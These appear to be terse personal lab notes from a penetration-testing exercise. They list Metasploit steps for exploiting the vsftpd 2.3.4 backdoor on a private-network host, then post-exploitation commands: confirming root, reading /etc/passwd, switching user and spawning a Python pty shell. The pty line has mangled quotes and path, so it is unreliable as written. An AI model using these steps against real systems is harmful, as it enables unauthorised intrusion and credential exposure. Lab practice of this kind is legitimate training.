l2:
	/usr/share/kali-menu/helper-scripts/metasploit-framework.sh
	sudo netdiscover
	search vsftpd 2.3.4
	show options
	set RHOSTS 192.168.0.104
	exploit
l2pfSense:
	whoami
	root
	ip address
	cat /etc/passwd
	su msfadmin
	python -c ‘import pty; pty.spawn(“bin/sh”)’
